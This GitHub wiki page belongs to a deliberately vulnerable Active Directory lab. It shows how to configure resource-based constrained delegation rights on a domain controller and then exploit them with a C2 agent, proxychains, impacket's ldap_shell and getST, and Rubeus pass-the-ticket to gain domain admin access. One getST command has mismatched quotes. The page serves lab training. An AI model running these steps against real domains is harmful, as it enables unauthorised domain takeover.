Resource‐Based Constrained Delegation - benlee105/DeliberateVulnADConfig GitHub Wiki

Preparing for RBCD

Step 0: Preparing Attacker tools

Step 1: Create a computer account

As a domain admin, create a computer account with the powershell command below (replace DC= with actual domain):

New-ADComputer -Name "RBCDCOMPUTER" -SamAccountName "RBCDCOMPUTER$" -AccountPassword (ConvertTo-SecureString "P@ssw0rdP@ssw0rd" -AsPlainText -Force) -Enabled $true -Path "OU=Computers,DC=<DOMAINNAME>,DC=com"

Step 2: Grant computer account permissions to AD server

Right click your domain controller > Properties

image

Navigate to Security tab > click Add > Add your newly created computer account > click Advanced > click your newly created computer account > click Edit

You can now make a choice, to grant specific rights required only for RBCD, GenericWrite, or GenericAll

Choice 1: Grant specific rights required for RBCD

  • Tick Read msDS-AllowedToActOnBehalfOfOtherIdentity
  • Tick Write msDS-AllowedToActOnBehalfOfOtherIdentity

Choice 2: Grant GenericWrite

  • Tick Write all properties

Choice 3: Grant GenericAll

  • Tick Full control

Then click OK for everything.

Attacking via Exploiting RBCD

Step 1

Infect a machine with C2 agent and start socks proxy

Step 2

Configure proxychains /etc/proxychains.conf file to point to socks proxy server
sudo nano /etc/proxychains.conf

Step 3

Connect using impacket's ldap_shell, then set RBCD on domain controller
proxychains4 ldap_shell <domain/newComputerAccount$>
set_rbcd <domainController> <newComputerAccount$>

Step 4

Exit ldap_shell, use impacket's getST to request for service ticket of domain controller
proxychains4 python3 getST.py -dc-ip <domainController IP> '<domain>/<newComputerAccount>':'<password>' -spn 'LDAP/<domainController.domain.name> -impersonate 'domainController$>'

Step 5

Set environment variable KRB5CCNAME to point impacket scripts to the saved ccache file
You MUST put \ before the $ in the ccache file name, otherwise it'll return an error.
export KRB5CCNAME=/home/kali/impacket/examples/<ccache file name>

image

Step 6

With the returned hash, you can now request for a TGT and pass the ticket using Rubeus.
execute-assembly exe/Rubeus.exe asktgt /user:<domain admin> /domain:<domain> /aes256:<aes256 hash> /ptt

Step 7

Verify that you can now access the domain controller's filesystem, since you should now be domain admin.
ls \\<domainController>\C$

Cleanup

Cleanup msDS-AllowedToActOnBehalfOfOtherIdentity by logging in using ldap_shell as the newly created computer account, then clean up.
proxychains4 ldap_shell <newComputerAccount$>
clear_rbcd <domainController$>

Troubleshooting

If you run into the error that Kali can't find the ccache file, LOOK AT YOUR EXPORT COMMAND.

You need to put a \ before $ in your .ccache file name!

image

⚠️ **GitHub.com Fallback** ⚠️